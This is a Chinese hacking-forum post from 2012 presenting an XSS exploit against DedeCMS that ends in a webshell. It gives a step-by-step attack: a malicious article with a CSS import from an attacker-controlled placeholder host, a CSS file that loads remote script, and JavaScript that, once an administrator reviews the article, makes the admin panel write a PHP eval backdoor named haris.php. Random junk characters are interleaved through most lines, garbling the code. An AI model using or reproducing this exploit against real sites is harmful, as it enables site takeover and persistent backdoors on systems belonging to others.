找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 dedecms xss oday通杀所有版本 可getshell
欢迎中测联盟老会员回家,1997年注册的域名
返回列表 发新帖
查看: 1740|回复: 0
打印 上一主题 下一主题

dedecms xss oday通杀所有版本 可getshell

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2012-9-15 13:56:10 | 只看该作者 回帖奖励 |正序浏览 |阅读模式
<DIV id=read_tpc mb10?>漏洞原因:由于编辑器过滤不严,将导致恶意脚本运行。可getshell
% q) ?% `/ l- p+ }# i为什么说它是ODay呢,能getshell的都算OD把`(鸡肋发挥起来也能变凤凰)9 W5 r' w/ {( v# {
目前只是测试过5.3到5.7版本。其他更早的版本大家就自由发挥吧。
) h: f4 l, ], m下面说说利用方法。
( B4 l. q% v; n6 ?* R6 M+ F  g条件有2个:
9 V' ~  f) a3 X, P" l! s7 r! V1.开启注册
0 s1 o" n1 N9 c6 u1 l: {2.开启投稿
9 O) d1 b1 I8 M+ |+ ?注册会员----发表文章
8 A( S* v# F8 d内容填写:% {5 d/ F% x  p% t; |6 Z
复制代码) Z$ b7 t' T; m7 w
<style>@im\port'\http://xxx.com/xss.css';</style>
& H9 D5 C9 N" h# v- `8 E新建XSS.Css
# K+ L5 L  L6 E. H( y: D复制代码4 I) e. a* s! f/ S) [
.body{' t) l) @& V6 d4 v- S5 b9 j
background-image:url('javascript:document.write("<script src=http://xxx.com/xss.js></script>")') }3 W5 W3 V3 y: M. r2 c2 X6 b
新建xss.js 内容为
6 B& N% f. H3 u: E! j$ l复制代码' ?3 E. z! V4 D& ^, q
1.var request = false;8 M1 K# r% r. ~7 J8 v# l# L
2.if(window.XMLHttpRequest) {
' y+ L' i! i; _& T3.request = new XMLHttpRequest();
/ M. @: [- M5 o: K8 n4.if(request.overrideMimeType) {
5 s1 e- j* r% j/ t6 m5.request.overrideMimeType('text/xml');
* X  I4 g" X% w2 E6.}
6 X2 G% M; U$ N0 c7.} else if(window.ActiveXObject) {2 m. J! m) S& Q
8.var versions = ['Microsoft.XMLHTTP', 'MSXML.XMLHTTP', 'Microsoft.XMLHTTP', 'Msxml2.XMLHTTP.7.0','Msxml2.XMLHTTP.6.0','Msxml2.XMLHTTP.5.0', 'Msxml2.XMLHTTP.4.0', 'MSXML2.XMLHTTP.3.0', 'MSXML2.XMLHTTP'];+ X! j1 ]7 F# A
9.for(var i=0; i<versions.length; i++) {
- V3 d5 i0 x: M/ {( E10.try {
( [/ a% T7 V3 B; V2 W11.request = new ActiveXObject(versions);
" P0 x3 `) h8 v4 z12.} catch(e) {}7 u6 P- b; A) s- N' e
13.}) P4 m# L3 k. V5 }
14.}
# ~- [* {1 Y  {! e3 i15.xmlhttp=request;
& g) E& K2 w6 K9 T16.function getFolder( url ){. E) s% W: V& W" h! Q
17. obj = url.split('/')
$ y5 s2 r$ l2 V! @0 ^) a4 L5 s18. return obj[obj.length-2]
% ~% [2 Q4 J) y1 P0 m19.}
# I9 f7 p0 c$ d* m/ {/ g20.oUrl = top.location.href;
0 j; a7 [- V0 c: w21.u = getFolder(oUrl);
) a# v6 i( I5 r+ b22.add_admin();2 x2 c, l! m5 J) o3 `
23.function add_admin(){, M- N* _6 L8 I% s
24.var url= "/"+u+"/sys_sql_query.php";
1 I# v  X3 b. D0 ^25.var params ="fmdo=edit&backurl=&activepath=%2Fdata&filename=haris.php&str=<%3Fphp+eval%28%24_POST%5Bcmd%5D%29%3F>&B1=++%E4%BF%9D+%E5%AD%98++";
. N! x8 \- f! N, w8 w26.xmlhttp.open("POST", url, true);3 g* c% A7 A0 |6 a2 R" v5 w3 }1 f( V+ S
27.xmlhttp.setRequestHeader("Content-type", "application/x-www-form-urlencoded");( l& r  A9 U8 Y+ a8 g
28.xmlhttp.setRequestHeader("Content-length", params.length);; i# k% u$ T- B. g6 k" f
29.xmlhttp.setRequestHeader("Connection", "Keep-Alive");  D" M( N- z/ I( X( H
30.xmlhttp.send(params);+ {! [' C7 K+ @; N$ v( J
31.}
4 s1 Z% H& q8 J5 {当管理员审核这篇文章的时候,将自动在data目录生成一句话haris.php。密码cmd
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表